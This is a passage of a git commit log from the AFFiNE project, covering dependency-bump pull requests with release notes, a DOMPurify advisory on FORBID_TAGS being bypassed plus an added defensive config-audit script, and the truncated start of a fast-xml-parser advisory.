</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-20 19:18:29 +08:00
renovate[bot] cc79fa3c6d chore: bump up opentelemetry (#14844)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@opentelemetry/api](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/api) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`1.9.0` → `1.9.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fapi/1.9.0/1.9.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fapi/1.9.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fapi/1.9.0/1.9.1?slim=true) |
| [@opentelemetry/core](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-core) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fcore/2.6.0/2.7.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fcore/2.7.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fcore/2.6.0/2.7.0?slim=true) |
| [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.213.0/0.215.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.215.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.213.0/0.215.0?slim=true) |
| [@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.6.0/2.7.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-zipkin/2.7.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-zipkin/2.6.0/2.7.0?slim=true) |
| [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.213.0/0.215.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation/0.215.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation/0.213.0/0.215.0?slim=true) |
| [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.61.0` → `^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.61.0/0.63.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-graphql/0.63.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-graphql/0.61.0/0.63.0?slim=true) |
| [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.213.0/0.215.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-http/0.215.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-http/0.213.0/0.215.0?slim=true) |
| [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.61.0` → `^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.61.0/0.63.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-ioredis/0.63.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-ioredis/0.61.0/0.63.0?slim=true) |
| [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.59.0` → `^0.61.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.59.0/0.61.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-nestjs-core/0.61.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-nestjs-core/0.59.0/0.61.0?slim=true) |
| [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.60.0` → `^0.62.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.60.0/0.62.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-socket.io/0.62.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-socket.io/0.60.0/0.62.0?slim=true) |
| [@opentelemetry/resources](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-resources) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fresources/2.6.0/2.7.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fresources/2.7.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fresources/2.6.0/2.7.0?slim=true) |
| [@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.6.0/2.7.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-metrics/2.7.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-metrics/2.6.0/2.7.0?slim=true) |
| [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.213.0/0.215.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.215.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.213.0/0.215.0?slim=true) |
| [@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.6.0/2.7.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-trace-node/2.7.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-trace-node/2.6.0/2.7.0?slim=true) |

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js (@opentelemetry/api)</summary>

###
[`v1.9.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#191)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v1.9.0...v1.9.1)

##### 🐛 (Bug Fix)

- fix: avoid grpc types dependency
[#3551](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3551)
[@flarna](https://redirect.github.com/flarna)
- fix(otlp-proto-exporter-base): Match Accept header with Content-Type
in the proto exporter
[#3562](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3562)
[@scheler](https://redirect.github.com/scheler)
- fix: include tracestate in export
[#3569](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3569)
[@flarna](https://redirect.github.com/flarna)

##### 🏠 (Internal)

- chore: fix cross project links and missing implicitly exported types
[#3533](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3533)
[@legendecas](https://redirect.github.com/legendecas)
- feat(sdk-metrics): add exponential histogram mapping functions
[#3504](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3504)
[@mwear](https://redirect.github.com/mwear)

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib (@opentelemetry/instrumentation-graphql)</summary>

###
[`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0630-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
([#3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

###
[`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0620-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
([#3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@opentelemetry/instrumentation-ioredis)</summary>

###
[`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0630-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
([#3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

##### Bug Fixes

- **redis-common:** expand redaction to include ACL, CONFIG, PSETEX,
GETSET
([#3472](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3472))
([39193ca](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/39193cac4124eedc9e8fa5ae16ba960b5ab7a36b))

##### Dependencies

- The following workspace dependencies were updated
  - dependencies
    - [@opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common) bumped from ^0.38.2 to ^0.38.3
  - devDependencies
    - [@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.61.0 to ^0.62.0

###
[`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0620-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
([#3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
    - [@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.60.0 to ^0.61.0

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@opentelemetry/instrumentation-nestjs-core)</summary>

###
[`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0610-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
([#3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

###
[`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0600-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
([#3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@opentelemetry/instrumentation-socket.io)</summary>

###
[`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0620-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
([#3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
    - [@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.61.0 to ^0.62.0

###
[`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0610-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
([#3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
    - [@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.60.0 to ^0.61.0

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-19 16:20:32 +08:00
renovate[bot] 0849b342fa chore: bump up dompurify version to v3.4.0 [SECURITY] (#14833)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.3.3` →
`3.4.0`](https://renovatebot.com/diffs/npm/dompurify/3.3.3/3.4.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/dompurify/3.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/dompurify/3.3.3/3.4.0?slim=true)
|

### GitHub Vulnerability Alerts

####
[GHSA-39q2-94rc-95cp](https://redirect.github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp)

## Summary
In `src/purify.ts:1117-1123`, `ADD_TAGS` as a function (via
`EXTRA_ELEMENT_HANDLING.tagCheck`) bypasses `FORBID_TAGS` due to
short-circuit evaluation.

The condition:
```
!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])
```
When `tagCheck(tagName)` returns `true`, the entire condition is `false`
and the element is kept — `FORBID_TAGS[tagName]` is never evaluated.

## Inconsistency
This contradicts the attribute-side pattern at line 1214 where
`FORBID_ATTR` explicitly wins first:
```
if (FORBID_ATTR[lcName]) { continue; }
```
For tags, FORBID should also take precedence over ADD.

## Impact
Applications using both `ADD_TAGS` as a function and `FORBID_TAGS`
simultaneously get unexpected behavior — forbidden tags are allowed
through. Config-dependent but a genuine logic inconsistency.

## Suggested Fix
Check `FORBID_TAGS` before `tagCheck`:
```
if (FORBID_TAGS[tagName]) { /* remove */ }
else if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ }
```

## Affected Version
v3.3.3 (commit 883ac15)

##### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N`

---

### Release Notes

<details>
<summary>cure53/DOMPurify (dompurify)</summary>

###
[`v3.4.0`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.4.0):
DOMPurify 3.4.0

[Compare
Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.3...3.4.0)

**Most relevant changes:**

- Fixed a problem with `FORBID_TAGS` not winning over `ADD_TAGS`, thanks
[@kodareef5](https://redirect.github.com/kodareef5)
- Fixed several minor problems and typos regarding MathML attributes,
thanks [@DavidOliver](https://redirect.github.com/DavidOliver)
- Fixed `ADD_ATTR`/`ADD_TAGS` function leaking into subsequent
array-based calls, thanks
[@1Jesper1](https://redirect.github.com/1Jesper1)
- Fixed a missing `SAFE_FOR_TEMPLATES` scrub in `RETURN_DOM` path,
thanks [@bencalif](https://redirect.github.com/bencalif)
- Fixed a prototype pollution via `CUSTOM_ELEMENT_HANDLING`, thanks
[@trace37labs](https://redirect.github.com/trace37labs)
- Fixed an issue with `ADD_TAGS` function form bypassing `FORBID_TAGS`,
thanks [@eddieran](https://redirect.github.com/eddieran)
- Fixed an issue with `ADD_ATTR` predicates skipping URI validation,
thanks [@christos-eth](https://redirect.github.com/christos-eth)
- Fixed an issue with `USE_PROFILES` prototype pollution, thanks
[@christos-eth](https://redirect.github.com/christos-eth)
- Fixed an issue leading to possible mXSS via Re-Contextualization,
thanks
[@researchatfluidattacks](https://redirect.github.com/researchatfluidattacks)
and others
- Fixed a problem with the type definition patcher after Node version
bump
- Fixed freezing BS runs by reducing the tested browsers array
- Bumped several dependencies where possible
- Added needed files for OpenSSF scorecard checks

**Published Advisories are here:**

<https://github.com/cure53/DOMPurify/security/advisories?state=published>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-16 19:53:00 +08:00
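The tag decision from GHSA-39q2-94rc-95cp above, as an added example that is not DOMPurify source and not part of the commit message: it models the quoted pre-fix condition next to the suggested fix and audits a config for `FORBID_TAGS` entries that only the pre-fix logic would keep. The helper names (`keptBeforeFix`, `keptAfterFix`, `normalise`, `auditConfig`) are hypothetical, and it assumes the `ADD_TAGS` function receives the lower-cased tag name.

```javascript
// Added example: a model of the decision, not the library's code.

// Pre-fix condition as quoted in the advisory: the element is removed only
// when tagCheck rejects it AND it is either not allowed or forbidden.
function keptBeforeFix(tagName, { tagCheck, allowed, forbidden }) {
  const remove =
    !tagCheck(tagName) && (!allowed.has(tagName) || forbidden.has(tagName));
  return !remove;
}

// Suggested fix from the advisory: FORBID_TAGS is checked first and wins.
function keptAfterFix(tagName, { tagCheck, allowed, forbidden }) {
  if (forbidden.has(tagName)) return false;
  return tagCheck(tagName) || allowed.has(tagName);
}

// Turn a DOMPurify-style config into the pieces both predicates need.
// defaultAllowed stands in for the library's built-in allow-list (assumption).
function normalise(config, defaultAllowed = []) {
  const addTags = config.ADD_TAGS;
  const isFn = typeof addTags === 'function';
  const allowed = new Set(defaultAllowed.map((t) => String(t).toLowerCase()));
  if (Array.isArray(addTags)) {
    addTags.forEach((t) => allowed.add(String(t).toLowerCase()));
  }
  const forbidden = new Set(
    (config.FORBID_TAGS || []).map((t) => String(t).toLowerCase())
  );
  const tagCheck = isFn ? (t) => Boolean(addTags(t)) : () => false;
  return { tagCheck, allowed, forbidden, isFn };
}

// Report which forbidden tags the pre-fix logic keeps but the fix removes.
function auditConfig(config, defaultAllowed) {
  const n = normalise(config, defaultAllowed);
  const leaked = [...n.forbidden].filter(
    (t) => keptBeforeFix(t, n) && !keptAfterFix(t, n)
  );
  return { usesFunctionForm: n.isFn, leaked };
}

// Constructed sample configs.
const functionForm = {
  ADD_TAGS: (t) => t.startsWith('x-') || t === 'style',
  FORBID_TAGS: ['style', 'X-Danger', 'iframe'],
};
const arrayForm = { ADD_TAGS: ['style'], FORBID_TAGS: ['style'] };

console.log(auditConfig(functionForm));
console.log(auditConfig(arrayForm));
```

An empty `leaked` list means the config does not depend on the precedence bug; a non-empty one names the tags to re-test after upgrading.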
DarkSky a109f069b0 chore: bump deps 2026-04-10 11:46:14 +08:00
DarkSky c6a99eb9cb chore: bump deps (#14810)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Updated developer tooling dependencies used for local testing to newer
patch versions for improved stability.
* Bumped backend framework and related packages to newer patch releases
to address fixes and maintain compatibility.
* No functional or public API changes; updates are non-breaking
dependency version bumps.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-09 12:41:38 +08:00
DarkSky fee0cfa3f4 chore: bump deps (#14785)
#### PR Dependency Tree


* **PR #14785** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
  * Updated error-tracking SDK versions across frontend packages.
* Upgraded Electron build toolchain and front-end build plugins for
improved compatibility.
* Replaced a SWC-based React plugin with the standard React Vite plugin.
  * Removed unused development dependencies from CLI tooling.
  * Bumped a Rust workspace dependency to a patch release.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 12:25:18 +08:00
DarkSky ffc27af3ba fix(server): update version check (#14784)
fix #14780


#### PR Dependency Tree


* **PR #14784** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
* Improved upgrade availability detection to properly compare semantic
versions, including support for prerelease and canary versions. The
system now accurately identifies when new versions are available,
ensuring users receive timely update notifications.

* **Tests**
* Added comprehensive unit tests for version comparison and upgrade
detection functionality.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 10:56:05 +08:00
DarkSky 5a6c65085a feat(mobile): adapt new endpoint (#14778)
#### PR Dependency Tree


* **PR #14778** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-04-04 20:39:42 +08:00
DarkSky d3ec008b0c chore: bump deps (#14777)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Migration and config commands now feature interactive prompts for
required inputs.

* **Bug Fixes**
  * Enhanced error handling in CLI operations.

* **Chores**
  * Updated GraphQL Code Generator toolchain to v6.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 19:36:18 +08:00
DarkSky 233004f867 chore: bump oxlint & enable more supported rules (#14769) 2026-04-03 03:36:52 +08:00
DarkSky 91ad783973 fix(test): e2e stability (#14749)
#### PR Dependency Tree


* **PR #14749** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved link preview reliability by updating request identification
to better match modern browsers.
* **Tests**
* Made end-to-end and integration tests deterministic and more robust,
improving AI chat, image generation, attachment handling, settings
visibility, and editor flows.
* **Chores**
* Updated underlying tooling versions to enhance stability and
compatibility.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-29 23:26:15 +08:00
DarkSky 6a93566422 chore: bump deps (#14690)
#### PR Dependency Tree


* **PR #14690** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Updated package manager and development tooling to latest compatible
versions.
* Updated backend framework and monitoring dependencies to latest
minor/patch releases.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 05:23:03 +08:00
DarkSky 7ac8b14b65 feat(editor): migrate typst mermaid to native (#14499)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Native/WASM Mermaid and Typst SVG preview rendering on desktop and
mobile, plus cross-platform Preview plugin integrations.

* **Improvements**
* Centralized, sanitized rendering bridge with automatic Typst
font-directory handling and configurable native renderer selection.
* More consistent and robust error serialization and worker-backed
preview flows for improved stability and performance.

* **Tests**
* Extensive unit and integration tests for preview rendering, font
discovery, sanitization, and error serialization.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 04:04:40 +08:00
renovate[bot] c1a09b951f chore: bump up fast-xml-parser version to v5.5.6 [SECURITY] (#14676)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[fast-xml-parser](https://redirect.github.com/NaturalIntelligence/fast-xml-parser)
| [`5.4.1` →
`5.5.6`](https://renovatebot.com/diffs/npm/fast-xml-parser/5.4.1/5.5.6)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/fast-xml-parser/5.5.6?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/fast-xml-parser/5.4.1/5.5.6?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-33036](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r)

## Summary

The fix for CVE-2026-26278 added entity expansion limits
(`maxTotalExpansions`, `maxExpandedLength`, `maxEntityCount`,
`maxEntitySize`) to prevent XML entity expansion Denial of Service.
However, these limits are only enforced for DOCTYPE-defined entities.
**Numeric character references** (`&#NNN;` and `&#xHH;`) and standard
